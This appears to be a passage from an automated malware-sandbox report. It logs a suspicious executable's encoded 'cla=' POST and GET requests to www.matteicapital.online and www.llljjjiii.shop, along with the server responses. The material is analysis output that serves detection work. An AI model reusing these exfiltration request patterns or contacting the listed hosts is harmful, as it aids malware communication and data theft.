                                                                                                            Data Raw: 63 6c 61 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 56 55 49 64 6e 47 68 68 34 68 66 4f 56 51 50 49 48 71 63 6c 33 61 33 56 6b 70 30 30 44 47 32 66 6f 49 4b 50 58 54 4b 6f 72 66 72 6c 78 57 64 46 57 4e 4e 77 4f 56 50 73 6d 79 33 2b 51 6f 4c 51 2f 44 34 6c 31 58 69 37 35 69 6a 55 61 79 57 75 47 57 58 5a 4a 69 6a 41 34 36 54 43 50 68 6f 37 41 69 36 36 73 48 30 58 49 36 4b 78 49 35 38 63 52 2b 4f 47 65 69 78 34 78 71 64 58 55 2f 4c 2f 4c 5a 32 49 73 59 62 43 50 39 31 50 68 54 54 39 66 48 79 38 6d 31 33 6c 55 4a 7a 78 56 2b 72 72 44 46 34 49 74 76 39 55 58 63 4c 51 7a 2f 57 33 46 69 56 42 68 45 74 6c 35 63 30 3d
                                                                                                            Data Ascii: cla=SoNrVhZITNTyVUIdnGhh4hfOVQPIHqcl3a3Vkp00DG2foIKPXTKorfrlxWdFWNNwOVPsmy3+QoLQ/D4l1Xi75ijUayWuGWXZJijA46TCPho7Ai66sH0XI6KxI58cR+OGeix4xqdXU/L/LZ2IsYbCP91PhTT9fHy8m13lUJzxV+rrDF4Itv9UXcLQz/W3FiVBhEtl5c0=


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.549963208.91.197.27802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:48.885040045 CET648OUTPOST /hyyd/ HTTP/1.1
                                                                                                            Host: www.matteicapital.online
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.matteicapital.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.matteicapital.online/hyyd/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 43 66 70 70 36 50 47 68 79 6f 6f 66 72 6c 36 32 64 45 59 74 4e 6e 4f 56 53 66 6d 7a 4c 2b 51 73 6a 51 2f 47 63 6c 31 6b 36 34 35 79 6a 57 4f 43 57 57 49 32 58 5a 4a 69 6a 41 34 35 75 58 50 68 77 37 42 53 4b 36 2b 57 31 6c 54 61 4b 79 50 35 38 63 47 75 4f 4b 65 69 77 76 78 70 59 79 55 35 50 2f 4c 5a 47 49 73 4a 62 42 47 39 31 46 2b 44 54 74 57 69 72 71 6b 30 54 43 64 5a 47 6b 4f 50 6e 73 43 7a 4a 69 33 4e 31 38 45 38 6e 6f 6a 73 65 41 55 53 30 6f 37 6e 39 56 6e 4c 6a 6b 71 34 55 45 41 4b 34 49 33 73 66 2f 39 33 49 69 55 48 50 46
                                                                                                            Data Ascii: cla=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD0Cfpp6PGhyoofrl62dEYtNnOVSfmzL+QsjQ/Gcl1k645yjWOCWWI2XZJijA45uXPhw7BSK6+W1lTaKyP58cGuOKeiwvxpYyU5P/LZGIsJbBG91F+DTtWirqk0TCdZGkOPnsCzJi3N18E8nojseAUS0o7n9VnLjkq4UEAK4I3sf/93IiUHPF


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.549968208.91.197.27802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:51.547869921 CET1665OUTPOST /hyyd/ HTTP/1.1
                                                                                                            Host: www.matteicapital.online
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.matteicapital.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.matteicapital.online/hyyd/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 36 66 70 66 6d 50 58 32 6d 6f 70 66 72 6c 33 57 64 4a 59 74 4d 6c 4f 56 4b 54 6d 7a 47 4a 51 75 62 51 2b 67 51 6c 69 6c 36 34 33 79 6a 57 4d 43 57 74 47 57 57 45 4a 69 7a 45 34 35 2b 58 50 68 77 37 42 55 6d 36 39 48 31 6c 55 71 4b 78 49 35 38 49 52 2b 4f 6d 65 69 70 61 78 6f 74 48 55 4b 48 2f 4c 35 57 49 76 2f 48 42 48 64 31 44 2f 44 53 79 57 69 75 30 6b 30 66 5a 64 5a 44 73 4f 49 72 73 50 31 41 70 74 76 41 71 52 65 7a 4c 70 38 47 58 41 6c 77 6a 35 55 31 63 37 59 7a 2b 72 70 38 34 49 66 41 6c 6b 50 69 64 76 68 63 54 5a 51 79 4c 74 49 6f 67 43 66 41 37 35 4b 5a 63 74 31 48 78 6a 76 7a 58 35 4f 74 54 71 4d 65 63 59 41 6c 50 69 35 42 32 67 73 46 77 66 2b 73 59 68 52 78 77 35 6a 33 6f 72 4a 30 67 31 66 55 66 74 52 73 2b 34 68 31 74 71 77 33 66 6f 58 5a 51 2f 68 57 72 58 75 72 41 74 52 49 42 62 7a 4a 49 7a 61 51 57 53 4b 70 44 35 37 4c 46 39 4d 6e 4e 68 5a 49 54 68 42 [TRUNCATED]
                                                                                                            Data Ascii: cla=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD06fpfmPX2mopfrl3WdJYtMlOVKTmzGJQubQ+gQlil643yjWMCWtGWWEJizE45+XPhw7BUm69H1lUqKxI58IR+OmeipaxotHUKH/L5WIv/HBHd1D/DSyWiu0k0fZdZDsOIrsP1AptvAqRezLp8GXAlwj5U1c7Yz+rp84IfAlkPidvhcTZQyLtIogCfA75KZct1HxjvzX5OtTqMecYAlPi5B2gsFwf+sYhRxw5j3orJ0g1fUftRs+4h1tqw3foXZQ/hWrXurAtRIBbzJIzaQWSKpD57LF9MnNhZIThBCwZNNy+2nld3YnxJf+v7Qx9WHD7h1pAIoMZaugBhOk1PQ39GitvKalCc40dzHtmgFZ/07fZdAeeV65kDcck9pSdHZ48ZuRTP//TzDqoaKDZqQXgK23BvLm/XSz5XMLetyNYqBlrPt0Fl1ZbJZc8a1hdjISBsmxG0A3TjcjfuWqqggh9vjfuG5jdB23mm5taVgaBZGLp0YJxBxhHXs55Ui1Fq/Kn6EshZ/9vQUglAMyW13MihRyo/jiFLHdkesVRUepcNaIrkJoRgL3t2k33FHLBJMXA0YhchXeRXE8HnUegurWpz42q4d6EKJT2TurYbEEt/ayx1h2AErKhunDA8Lcn4H6NLaIBHNFQ/5sgLs8LrxEvploS/y6xAxTd5iHV6MuT7IX4DqN0S0LY17DT711YnYHpo4nwcC9ItQPcLiFPkrLJ4S25LHnRQMJ9uUA6NgNqdGcYnppe+MP3muKkbe1yLQeRp/ZDmzFrRkiSSrHvv/XG0g2j+02H+ozgRWEHKnchnxSyomNwm8RoBMRuf3k9TPfDolFJncmsw3NDoYuQy+egxAVZZzWF9x8OiQ7hzkoT8cU7Lbe0jrbkaZV+5xHfgx3Xy35lV92UQkSm7l5PgKK35tA4GyKRI7t1tiFaFWN/sGWAG/hwdlXtoUBrHK6N7UxaM/SnT3x [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.549975208.91.197.27802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:56:54.212625027 CET358OUTGET /hyyd/?jbeXk=EHbdQPuX&cla=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA== HTTP/1.1
                                                                                                            Host: www.matteicapital.online
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:56:56.263345003 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 22 Nov 2024 06:56:55 GMT
                                                                                                            Server: Apache
                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                            Set-Cookie: vsid=911vr4798042154029200; expires=Wed, 21-Nov-2029 06:56:55 GMT; Max-Age=157680000; path=/; domain=www.matteicapital.online; HttpOnly
                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_CFf7J/wdm3keJ20jtKk/wukqgAPBs54m03qfiZN8qnYbgSfmFLDEoQkyGoMaxh12FVU0jNetik5CoimDDMy4Bg==
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Connection: close
                                                                                                            Data Raw: 39 66 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65
                                                                                                            Data Ascii: 9f08<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.ne
                                                                                                            Nov 22, 2024 07:56:56.263411999 CET1236INData Raw: 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69
                                                                                                            Data Ascii: t"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" i
                                                                                                            Nov 22, 2024 07:56:56.263448000 CET1236INData Raw: 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e
                                                                                                            Data Ascii: tion(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languag
                                                                                                            Nov 22, 2024 07:56:56.263483047 CET401INData Raw: 67 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75
                                                                                                            Data Ascii: guages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash
                                                                                                            Nov 22, 2024 07:56:56.308244944 CET1236INData Raw: 73 74 72 28 30 2c 77 2e 69 6e 64 65 78 4f 66 28 22 26 22 29 29 7d 72 65 74 75 72 6e 20 77 7d 76 61 72 20 6b 3d 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 68 29 3f 68 2e 63 6d 70 5f 70 72 6f 74 6f 3a 22 68 74 74 70 73 3a 22 3b 69 66 28 6b 21
                                                                                                            Data Ascii: str(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:location.href;var j=u.createElement("script");j.setAttribute("data-cmp-ab","1");var c=x("cmpde
                                                                                                            Nov 22, 2024 07:56:56.308305025 CET1236INData Raw: 22 73 63 72 69 70 74 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 76 61 72 20 6d 3d 22
                                                                                                            Data Ascii: "script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}var m="js";var p=x("cmpdebugunminimized","cmpdebugunminimized" in h?h.cmpdebugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcoverage" in h?h.cmp_debug
                                                                                                            Nov 22, 2024 07:56:56.308360100 CET1236INData Raw: 54 69 6d 65 6f 75 74 28 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 2c 31 30 2c 62 29 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 72 63 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b
                                                                                                            Data Ascii: Timeout(window.cmp_addFrame,10,b)}}};window.cmp_rc=function(h){var b=document.cookie;var f="";var d=0;while(b!=""&&d<100){d++;while(b.substr(0,1)==" "){b=b.substr(1,b.length)}var g=b.substring(0,b.indexOf("="));if(b.indexOf(";")!=-1){var c=b.s
                                                                                                            Nov 22, 2024 07:56:56.308394909 CET1236INData Raw: 6e 28 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 3b 5f 5f 67 70 70 2e 71 3d 5f 5f 67 70 70 2e 71 7c 7c 5b 5d 3b 69 66 28 21 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 20 5f 5f 67 70 70 2e 71 7d 76 61 72 20 67 3d 61 5b 30 5d 3b 76 61
                                                                                                            Data Ascii: n(){var a=arguments;__gpp.q=__gpp.q||[];if(!a.length){return __gpp.q}var g=a[0];var f=a.length>1?a[1]:null;var e=a.length>2?a[2]:null;if(g==="ping"){return window.cmp_gpp_ping()}else{if(g==="addEventListener"){__gpp.e=__gpp.e||[];if(!("lastId"
                                                                                                            Nov 22, 2024 07:56:56.308432102 CET1236INData Raw: 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d 29 7d 69 66 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c
                                                                                                            Data Ascii: d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__uspapiCall" in c){var b=c.__uspapiCall;window.__uspapi(b.command,b.version,function(h,g){var e={__uspapiReturn:{returnValue:h,success:g,callId:b.callId}};d
                                                                                                            Nov 22, 2024 07:56:56.308471918 CET1236INData Raw: 22 6f 62 6a 65 63 74 22 26 26 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 77 69 6e 64 6f 77 5b 61 5d 21 3d 3d 6e 75 6c 6c 29 29 29 7b 77 69 6e 64 6f 77 5b 61 5d 3d 77 69 6e 64 6f 77 2e 63
                                                                                                            Data Ascii: "object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_gppstub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_addFrame("__cmpLocator");if(!("
                                                                                                            Nov 22, 2024 07:56:56.383389950 CET1236INData Raw: 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 74 74 65 69 63 61 70 69 74 61 6c 2e 6f 6e 6c 69 6e 65 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 64 57 55 32 57 58 68 33 4e 7a 4a 72 62 30 4e 49 61 7a 4a 6c 65 55 73 79
                                                                                                            Data Ascii: rc="http://www.matteicapital.online/sk-logabpstatus.php?a=dWU2WXh3NzJrb0NIazJleUsyV3l2VTF3aE5wY1duRlNmaFlMYmM0WDdKU3hnRElacDRONThTUmpsd0poZUJYWWFmYmJXUE1xSVZTbHJjQ2xCMW5ZaDIxUEo2TEJUc0tzYUxyU3Z6TnEyYzVVK0ZpY3VwcXhJN1dzbEUvK1ZOSC8=&b="+abp;docu


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.5499948.210.114.150802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:02.505940914 CET610OUTPOST /rsvy/ HTTP/1.1
                                                                                                            Host: www.llljjjiii.shop
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.llljjjiii.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 33 4b 49 67 36 67 64 6b 34 54 50 67 68 67 43 44 55 7a 30 42 6f 6e 7a 50 46 35 63 4d 31 5a 6a 77 31 56 77 49 50 6b 54 45 34 63 66 42 4d 57 30 52 4a 58 4e 37 4f 67 65 2b 61 57 48 62 79 43 33 6a 45 72 45 62 6d 75 31 49 42 76 36 52 79 30 6f 66 39 53 66 69 35 6a 36 37 34 61 48 32 62 65 79 55 43 77 59 72 36 31 68 34 73 63 6f 4c 5a 2f 74 74 30 63 43 30 6f 30 36 6c 55 64 36 78 33 38 39 6c 30 58 32 58 6e 66 64 34 50 6d 39 56 6a 36 62 7a 31 55 74 4f 4a 4c 36 32 38 71 6b 43 49 39 74 4a 37 6a 63 4d 61 43 4b 62 55 65 37 36 31 4c 4a 46 64 36 43 62 62 4a 78 66 74 70 59 3d
                                                                                                            Data Ascii: cla=m+7KIMtJ4/BT3KIg6gdk4TPghgCDUz0BonzPF5cM1Zjw1VwIPkTE4cfBMW0RJXN7Oge+aWHbyC3jErEbmu1IBv6Ry0of9Sfi5j674aH2beyUCwYr61h4scoLZ/tt0cC0o06lUd6x389l0X2Xnfd4Pm9Vj6bz1UtOJL628qkCI9tJ7jcMaCKbUe761LJFd6CbbJxftpY=
                                                                                                            Nov 22, 2024 07:57:04.115753889 CET925INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:57:03 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: PHPSESSID=8a3uj438f2kir6vkhmeb9c68f1; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                            Pragma: no-cache
                                                                                                            Set-Cookie: sessionid=8a3uj438f2kir6vkhmeb9c68f1; expires=Mon, 20-Nov-2034 06:57:03 GMT; Max-Age=315360000; path=/
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 31 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 52 d9 6e 9c 30 14 7d cf 57 dc 3a aa e6 25 06 66 49 53 61 20 52 22 e5 b1 ff 70 31 0e 78 e2 85 da 66 02 fd fa 1a 33 5d 22 e5 ed de e3 63 9f 45 ae 86 a0 55 73 53 0d 02 bb e6 06 a0 d2 22 20 18 d4 a2 26 17 29 de 47 eb 02 01 6e 4d 10 26 d4 e4 5d 76 61 a8 3b 71 91 5c d0 b4 dc 49 23 83 44 45 3d 47 25 ea fd 9d 8e 80 9e f4 bf 1d e7 0f fb e4 85 4b 87 d8 46 be b1 04 f2 24 ec b9 93 63 00 ef 78 4d f2 71 6a 95 e4 f9 19 2f b8 e1 f9 f9 e7 24 dc 42 0f d9 21 3b 66 51 23 3b fb c7 4b 4d 00 c2 32 46 af 41 cc e1 3f 3a 69 aa 7c bb 18 b3 e5 5b b8 aa b5 dd 02 3e 2c 51 96 b4 c8 df 7a 67 27 d3 51 6e 95 75 25 dc 7e eb f0 9e 1f 19 89 37 a4 ee af c4 9d c6 79 0b 5a c2 a9 28 c6 99 a5 d4 25 ec 8b e2 2b 1b ad 8f e1 ad 29 01 5b 6f d5 14 04 73 b2 1f 42 09 05 0b 76 2c e1 18 49 4a bc 26 40 a3 eb 65 a4 16 80 53 b0 6c f7 31 aa d4 d8 8b fc 54 9c b2 d1 f4 24 56 52 7d a1 b4 1a f6 7f 7c 5c 65 37 0f 9f e8 6e af d3 4d 8c 1e 92 d5 2b 96 9c d0 ef 2b 92 c6 fb bf a6 d6 a9 93 7e 54 b8 94 d0 2a cb df d8 [TRUNCATED]
                                                                                                            Data Ascii: 18dmRn0}W:%fISa R"p1xf3]"cEUsS" &)GnM&]va;q\I#DE=G%KF$cxMqj/$B!;fQ#;KM2FA?:i|[>,Qzg'Qnu%~7yZ(%+)[osBv,IJ&@eSl1T$VR}|\e7nM++~T*/*M'}yzx~xfkcp&r6Z&kka~1h0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.5500018.210.114.150802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:05.171899080 CET630OUTPOST /rsvy/ HTTP/1.1
                                                                                                            Host: www.llljjjiii.shop
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.llljjjiii.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 32 71 34 67 38 42 64 6b 36 7a 50 2f 75 41 43 44 4f 44 30 64 6f 6e 76 50 46 38 39 58 31 4d 37 77 30 78 30 49 4f 6c 54 45 2f 63 66 42 45 32 30 55 4e 58 4e 77 4f 67 54 42 61 58 37 62 79 43 7a 6a 45 6f 51 62 6e 64 64 4c 51 76 36 54 72 6b 6f 64 7a 79 66 69 35 6a 36 37 34 65 58 59 62 65 61 55 43 68 49 72 37 58 5a 2f 33 38 6f 49 4a 50 74 74 6a 4d 44 39 6f 30 36 54 55 59 62 61 33 35 35 6c 30 57 47 58 6d 4b 78 33 45 6d 39 54 2b 4b 62 69 79 48 63 64 47 36 53 6d 77 61 70 34 59 63 52 7a 7a 31 74 6d 41 67 43 7a 48 2b 58 43 6c 59 42 79 4d 4b 6a 79 42 71 68 76 7a 2b 4f 53 4a 35 50 4e 74 64 4e 48 7a 2f 75 43 50 53 31 6e 33 6c 42 32
                                                                                                            Data Ascii: cla=m+7KIMtJ4/BT2q4g8Bdk6zP/uACDOD0donvPF89X1M7w0x0IOlTE/cfBE20UNXNwOgTBaX7byCzjEoQbnddLQv6Trkodzyfi5j674eXYbeaUChIr7XZ/38oIJPttjMD9o06TUYba355l0WGXmKx3Em9T+KbiyHcdG6Smwap4YcRzz1tmAgCzH+XClYByMKjyBqhvz+OSJ5PNtdNHz/uCPS1n3lB2
                                                                                                            Nov 22, 2024 07:57:06.801637888 CET925INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:57:06 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: PHPSESSID=jhponootar5kt1v0atttbo1bv3; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                            Pragma: no-cache
                                                                                                            Set-Cookie: sessionid=jhponootar5kt1v0atttbo1bv3; expires=Mon, 20-Nov-2034 06:57:06 GMT; Max-Age=315360000; path=/
                                                                                                            Content-Encoding: gzip
